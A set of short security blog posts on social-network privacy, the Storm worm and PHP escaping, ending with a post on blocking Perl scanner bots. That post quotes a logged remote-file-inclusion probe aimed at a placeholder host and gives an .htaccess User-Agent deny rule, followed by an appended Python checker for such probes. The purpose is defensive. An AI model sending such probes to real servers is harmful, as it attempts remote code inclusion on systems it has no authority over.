Oct 29

This article pretty much summarizes how I feel about all social networking websites such as Facebook and Myspace - they're just huge dumps for saving all sorts of personal information you shouldn't be giving out. No matter what you use social networking websites for (i.e., catching up with old friends, sending messages, etc.), it's possible to do these things without giving out excessive information, but people are often drawn to doing these things.

The idea of Facebook as a US government project makes a good conspiracy theory, but you don't need a tinfoil hat to realise that its 30-plus million users are storing huge amounts of personal data such as their address and interests on the service. If you use it to its full potential, you can share details not just of your interests, but your employment, educational history, sexual orientation, friends and family and even day-to-day activities. If you don't change the default privacy settings, you could be sharing that information not just with people you know but with entire cities or even countries that have made their own groups.

Read the rest here.

Oct 28

I couldn't help but notice this while I was doing my daily Stumbling. Just goes to show that hackers are mighty creative when it comes to protecting their assets.

The Storm worm is fighting back against security researchers that seek to destroy it and has them running scared, Interop New York show attendees heard Tuesday. The worm can figure out which users are trying to probe its command-and-control servers, and it retaliates by launching DDoS attacks against them, shutting down their Internet access for days, says Josh Corman, host-protection architect for IBM/ISS, who led a session on network threats.

Read the rest here.

Sep 29

There's something I have recently noticed among PHP "security experts" (people who have had their software criticized at some point or other for poor security, and Googled "php security"). For some reason, some PHP developers have this idea that mysql_escape_string or mysql_real_escape_string is the answer to all of their problems. Wrong, wrong, wrong, wrong, wrong, wrong, WRONG. Read the rest of this entry »

Sep 21

Ever since I saw it, I knew I had to have an IronKey flashdrive. Some features:

  • Fast 30MBPS Read, 20MBPS Write
  • Drive contents encrypted with AES CBC-Mode Encryption
  • Onboard IronKey Password-manager keeps all your internet passwords safe
  • Secure version of Firefox included that encrypts all your web-surfing traffic
  • Encased in a potted metal case, not plastic, making it one of the strongest USB keys around
  • Exceeds MIL-STD-810F military waterproofing standards
  • The encryption chip self-destructs if an invasive attack is detected
  • If your Ironkey is lost, you can restore from a secure backup to a new Ironkey in minutes
  • Dual channel SLC NAND Flash for high-quality and read/write speeds

Anyone feeling generous? :D

Sep 19

I see Perl bots crawling my website hundreds of times a month because I have posted some vulnerabilities here that show up in Google, thus making the bot think my site is vulnerable. This isn't a big deal as far as my site being defaced - I don't run the things they look for. However, it is quite an annoyance to see hundreds and hundreds of requests that look like this:

/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xxx?
	Http Code: 301 	Date: Sep 19 18:50:37 	Http Version: HTTP/1.1 	Size in Bytes: -
	Referer: -
	Agent: libwww-perl/5.79

So I added this to my .htaccess file, and poof. They get a 403. :)

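# Return 403 Forbidden to clients whose User-Agent starts with lwp- or libwww-
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^lwp- [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-
RewriteRule ^.* - [F,L]
</IfModule>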

You can add any User-Agents you want to with this, I just chose some common ones. This needs to go at the top of the .htaccess file if you have something like WordPress permalink redirects set up in your .htaccess.
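
An added example (not from the original post): a Python check that replays access-log lines against the same two User-Agent prefixes and also flags requests that carry a URL in a query parameter, the request shape shown above, which the User-Agent rule does not cover when the client sends a different agent string. It assumes the Apache combined log format; the sample lines and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Same anchored, case-sensitive prefixes as the two RewriteCond lines.
BLOCKED_UA = re.compile(r"^(?:lwp-|libwww-)")
# Assumption: Apache "combined" LogFormat; adjust the pattern if yours differs.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def has_remote_include(target):
    """True if a query parameter's value is a URL, the shape of the probe shown above."""
    query = target.partition("?")[2]
    return any(REMOTE_VALUE.match(value)
               for _, value in parse_qsl(query, keep_blank_values=True))

def classify(line):
    """Label one log line: 'ua_rule', 'probe_not_covered', 'clean' or 'unparsed'."""
    m = COMBINED.match(line)
    if not m:
        return "unparsed"
    if BLOCKED_UA.match(m["agent"]):
        return "ua_rule"            # the .htaccess rule answers this with 403
    if has_remote_include(m["target"]):
        return "probe_not_covered"  # same request shape, User-Agent rule does not fire
    return "clean"

def summarize(lines):
    """Count labels so the rule's coverage can be checked before and after deploying it."""
    return Counter(classify(line) for line in lines)

# Constructed sample lines (documentation IP ranges, arbitrary timestamps).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2000:00:00:00 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xxx? HTTP/1.1" 301 - "-" "libwww-perl/5.79"',
    '192.0.2.11 - - [01/Jan/2000:00:00:05 +0000] "GET /index.php?page=http://xxx? HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2000:00:00:09 +0000] "GET /?s=htaccess HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [01/Jan/2000:00:00:12 +0000] "GET /feed/ HTTP/1.1" 200 900 "-" "lwp-trivial/1.41"',
]

if __name__ == "__main__":
    for label, count in summarize(SAMPLE).most_common():
        print(f"{label:18} {count}")
```

Lines labelled probe_not_covered are the ones to review when deciding whether to add more User-Agents or a different kind of condition.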
